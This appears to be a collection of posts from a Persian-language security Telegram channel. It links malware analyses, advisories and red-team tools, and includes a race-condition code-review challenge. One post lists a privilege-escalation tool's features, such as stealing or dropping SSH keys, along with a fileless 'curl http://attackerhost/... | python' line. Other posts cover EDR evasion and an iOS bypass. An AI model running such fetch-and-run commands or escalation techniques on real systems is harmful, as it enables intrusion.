و اینهم یو تحلیل دیگر از فعالیت های بدافزاری

@Engineer_Computer

https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-ursnif-infections/

تحلیل بد افزار
How Pikabot obfuscates and decrypts strings.

How Pikabot retrieves API addresses.

How Pikabot slows down the analysis process.

How Pikabot generates victim uuid.
Collecting information from the victim’s machine.

How Pikabot decrypts C2 addresses.

How Pikabot utilizes Syscall.

@Engineer_Computer

https://kienmanowar.wordpress.com/2024/01/06/quicknote-technical-analysis-of-recent-pikabot-core-module/

کتابهای پیشنهادی در مسیر انجام تحلیل بدافزار

https://blog.securitybreak.io/my-top-books-to-learn-malware-analysis-and-reverse-engineering-2ae1c6e209b9

@Engineer_Computer

ترجمه کامل مقاله روزنامه هلندی
درخصوص اولین مرحله از حضور اکستاکس نت در ایران
@Engineer_Computer

https://onhexgroup.ir/stuxnet-erik-van-sabben/

rapid7 BLOG

InsightAppSec Advanced Authentication Settings: Token Replacement
Link : https://www.rapid7.com/blog/post/2023/08/01/insightappsec-advanced-authentication-settings-token-replacement/

Patch Tuesday - August 2023
Link: https://www.rapid7.com/blog/post/2023/08/08/patch-tuesday-august-2023/

Metasploit weekly wrap-up Aug 11, 2023
Link : https://www.rapid7.com/blog/post/2023/08/11/metasploit-weekly-wrapup-8/ 

@Engineer_Computer

یک رایت آپ برای کشف Dependency Confusion روی تارگت های مختلف. اگه این باگ رو پیدا کردید حتما اکسپلویتش کنید صرفا پیدا کردن دیپندسی بدرد نمیخوره و ریپورتتون ریجکت میشه. در حدی که نشون بدید یک درخواست به سرورتون زده میشه کافیه.

https://medium.com/@jeetpal2007/easiest-way-to-find-rce-package-dependency-25aa9cf47dcb

@Engineer_Computer

Secure Coding + Code Review Challenge

تو چالش بالا، آسیب پذیری قطعه کد رو پیدا کنید. کدی بنویسید که از اسیب پذیری جلوگیری کنه و یک Semgrep Rule یا CodeQL Query بنویسید که توی کدبیس های مختلف قابل شناسایی باشه.

@Engineer_Computer

جواب چالش:
آسیب پذیری که مورد نظر بود، Race Condition بود. در این کلاس در داخل متد add، یک race window داریم که اگه چندین درخواست همزمان بفرستیم باعث ایجاد contact های بیشتر از حد مجاز میشه. پترن check-to-act داخل کد قابل مشاهده هست. برای فیکسش باید در critical section لاک در نظر بگیریم که اینجا از asynx-mutex استفاده شده.
اگه از semgrep برای نوشتن رول بخواید استفاده کنید باید در کنار شناسایی پترن، کد رو هم review کنید تا ببینید واقعا race میخوره یا نه. پترنی که باید نوشته شه باید داخل چند مورد رو چک کنیم: داخل کلاس، داخل تابع معمولی، داخل arrow function که در روترها معمولا استفاده میشه. در داخل بلاک ها اگه یک شرطی بررسی بشه و در ادامه یک عملیات async داشته باشیم میتونه منجر به این آسیب پذیری بشه که برای اطمینان باید چک کنیم.
@Engineer_Computer

⭕️ اسکریپتی توسعه داده شده است که از ابزارهای توسعه داده قبلی مانند EDRSilencer و FireBlock بهره برده است. هدف اصلی این اسکریپت، شناسایی فایل های اجرایی مختلف است که با استفاده از پلتفرم فیلترینگ ویندوز (WFP) غیر فعال شده اند. برای دستیابی به این هدف، از ماژول NtObjectManager در اسکریپت استفاده شده است.

Detection approach

There is no native way to list and interact with WFP. To do that we need to use the NtObjectManager module.

With the help of NtObjectManager we will be able to list all filters and the approach will be:

Create a list with the executables you want to check
Listed filters that block connections
Filter that list by the executables provided

#RedTeam #Evasion
@Engineer_Computer

⭕️ به منظور خودکارسازی فرایند Privesc در سیستم های لینوکس و یونیکس، یک ابزار توسعه داده شده است که در دسته‌بندی Missconfig های setuid/setgid و sudo permission ها و ... تمرکز دارد. این ابزار عمدتاً برای مسابقات CTF طراحی شده است، اما در محیط های واقعی نیز قابل استفاده است.

Features

Automatically exploit misconfigured sudo permissions.
Automatically exploit misconfigured suid, sgid permissions.
Automatically exploit misconfigured capabilities.
Automatically convert arbitrary file read primitive into shell by stealing SSH keys.
Automatically convert arbitrary file write primitive into shell by dropping SSH keys.
Automatically convert arbitrary file write primitive into shell by writing to cron.
Automatically convert arbitrary file write primitive into shell using LD_PRELOAD.
Single file, easy to run fileless with curl http://attackerhost/gtfonow.py | python

#RedTeam #Privesc #bypass
@Engineer_Computer

🔸برنامه سبک ساده و سریع پروکسی ساکس برای ترمینال و برنامه‌های ترمینالی
🔹بدون نیاز به سرویس

♦️برای اتصال به نکوری:

sudo vi /etc/proxychains.conf

خط آخر پورت را به 2080 تغییر دهید.

socks4  127.0.0.1 2080

شیوه‌ی کار:

proxychains COMMAND

لینک‌ها:
👉🔗 Github
👉🔗 Arch Extra Repo
👉🔗 Wiki

#نکته #لینوکس #معرفی #آموزش
@Engineer_Computer

https://detect.fyi/threat-hunting-suspicious-windows-service-names-2f0dceea204c

برای هانترها و متخصصان SOC

آسیب پذیری خطرناک در ویندوز
وصله کنید

@Engineer_Computer
a Windows Kerberos security feature bypass vulnerability that allows attackers to bypass authentication mechanisms and launch impersonation attacks. Attackers can exploit this flaw via a machine-in-the-middle (MitM) attack.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20674

اینطور هست که اطلاعات حساس از برنامه های اندروئید بیرون کشیده می‌شوند

@Engineer_Computer

https://github.com/effortlessdevsec/ApkRecon

تمرین

مدیریت حادثه با پاورشل
با یک ویروس نمونه

@Engineer_Computer

https://www.securityinbits.com/incident-response/powershell-commands-for-incident-response/

ios PPL bypass
https://github.com/zhuxinlang/zhuxinlang.github.io/blob/main/GPU_CoreSight.m

@Engineer_Computer